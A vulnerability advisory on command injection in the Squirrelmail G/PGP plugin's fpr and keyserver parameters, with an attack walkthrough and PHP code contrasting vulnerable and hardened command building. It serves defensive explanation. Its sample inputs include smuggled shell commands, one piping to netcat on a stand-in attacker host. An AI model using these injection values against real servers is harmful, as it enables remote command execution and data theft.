The G/PGP (GPG) Plugin 2.1 and earlier for Squirrelmail allow remote authenticated users to execute arbitrary commands via shell metacharacters in (1) the fpr parameter to the deleteKey function in gpg_keyring.php, as called by (a) import_key_file.php, (b) import_key_text.php, and (c) keyring_main.php; and (2) the keyserver parameter to the gpg_recv_key function in gpg_key_functions.php, as called by gpg_options.php. NOTE: this issue may overlap CVE-2007-3636.
Squirrelmail's G/PGP (GPG) plugin, version 2.1 and earlier, is vulnerable to command injection: a remote user who holds a valid webmail login can execute arbitrary commands on the mail server, typically with the privileges of the web server account. The flaw stems from insufficient input validation: values supplied in the fpr and keyserver request parameters are passed to the gpg command line without escaping, so an attacker can append shell metacharacters and additional commands, potentially leading to complete compromise of the host.
Step 1: Target Identification: An attacker who already has a valid Squirrelmail account (the flaw is only reachable by authenticated users) identifies an instance with the vulnerable GPG plugin (2.1 or earlier) installed and enabled.
Step 2: Payload Crafting: The attacker builds a value that looks like a fingerprint or keyserver name but carries shell metacharacters and a trailing command, for example a hex string followed by ; whoami, or a hostname followed by | id.
Step 3: Parameter Injection: The attacker submits the payload in one of the vulnerable parameters through a crafted HTTP request: the fpr parameter reaches deleteKey in gpg_keyring.php via import_key_file.php, import_key_text.php or keyring_main.php, and the keyserver parameter reaches gpg_recv_key in gpg_key_functions.php via gpg_options.php.
Step 4: Command Execution: The plugin concatenates the parameter into a gpg command string and hands that string to a shell. The shell splits the string at the metacharacters and runs the attacker's command after (or instead of) gpg.
Step 5: Result Retrieval (Optional): Because the plugin's own response need not include the command output, the attacker may exfiltrate it separately, for example by redirecting it to a file that can later be fetched over HTTP, or by having the payload open an outbound network connection; which option works depends on the payload and on the server's configuration.
The root cause is that the GPG plugin uses user-controlled input directly in shell command strings without escaping or validating it. The fpr (fingerprint) and keyserver parameters are taken from the request and concatenated into the gpg command line used by deleteKey and gpg_recv_key, so shell metacharacters such as ;, | and & in those values are interpreted by the shell as command separators, and whatever follows them is executed. A fingerprint legitimately consists only of hex digits and a keyserver value only of a hostname, scheme and port, so either a strict allow-list check on the value or escaping with escapeshellarg() before it reaches the shell would have prevented the injection.
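The following PHP is an added illustration of the five-step attack above and of the root cause just described; it is not the plugin's own code. The command strings, the function names (build_delete_cmd_vulnerable, build_delete_cmd_hardened, build_recv_cmd_hardened) and the sample inputs are assumptions made for this example. The functions return the command line instead of executing it, so the effect of each input can be inspected without running gpg.

```php
<?php
// Added illustration, not the G/PGP plugin's own code. Function names,
// command strings and sample values are assumptions for this example.
// Each function returns the command string rather than executing it.

// Vulnerable pattern: the request parameter is concatenated straight into
// a shell command string. Once the string reaches /bin/sh, anything after
// a ';' or '|' in the parameter becomes a second command.
function build_delete_cmd_vulnerable(string $fpr): string
{
    return "gpg --batch --yes --delete-key " . $fpr . " 2>&1";
}

// Hardened: reject anything that is not a key fingerprint (32 or 40 hex
// digits), then escapeshellarg() the value that still has to reach the shell.
function build_delete_cmd_hardened(string $fpr): ?string
{
    if (!preg_match('/^(?:[0-9A-Fa-f]{32}|[0-9A-Fa-f]{40})$/', $fpr)) {
        return null;   // reject rather than try to strip metacharacters
    }
    return "gpg --batch --yes --delete-key " . escapeshellarg($fpr) . " 2>&1";
}

// Same treatment for the keyserver parameter: allow only an optional
// hkp:// or hkps:// scheme, a hostname and an optional port, and accept
// only a plain hex key ID (optionally 0x-prefixed) for the key to fetch.
function build_recv_cmd_hardened(string $keyserver, string $keyid): ?string
{
    if (!preg_match('#^(?:hkps?://)?[A-Za-z0-9.-]+(?::[0-9]{1,5})?$#', $keyserver)) {
        return null;
    }
    if (!preg_match('/^(?:0x)?[0-9A-Fa-f]{8,40}$/', $keyid)) {
        return null;
    }
    return "gpg --batch --keyserver " . escapeshellarg($keyserver)
        . " --recv-keys " . escapeshellarg($keyid) . " 2>&1";
}

// Constructed sample inputs of the kind Step 2 describes.
$malicious_fpr  = "DEADBEEF; id > /tmp/pwned";
$malicious_ks   = "pgp.example.net | nc attacker.example 4444";
$legitimate_fpr = str_repeat("0F", 20);
$legitimate_ks  = "hkp://pgp.example.net:11371";

echo "vulnerable : ", build_delete_cmd_vulnerable($malicious_fpr), "\n";
echo "hardened   : ", var_export(build_delete_cmd_hardened($malicious_fpr), true), "\n";
echo "hardened   : ", build_delete_cmd_hardened($legitimate_fpr), "\n";
echo "recv (bad) : ", var_export(build_recv_cmd_hardened($malicious_ks, "0xDEADBEEF"), true), "\n";
echo "recv (ok)  : ", build_recv_cmd_hardened($legitimate_ks, "0xDEADBEEF"), "\n";
```

Run with php on the command line. The string returned by build_delete_cmd_vulnerable for the malicious fingerprint is exactly what Step 4 describes: handed to a shell, it runs gpg with a bogus fingerprint and then runs id as a second command. The hardened versions return null for both malicious inputs, and wrap the legitimate values in single quotes. The allow-list check is deliberately placed before escapeshellarg(): escaping only stops the shell from splitting the value, it does not stop a value beginning with -- from being read by gpg as an option, so the narrow character check is the control that matters and the escaping is defence in depth.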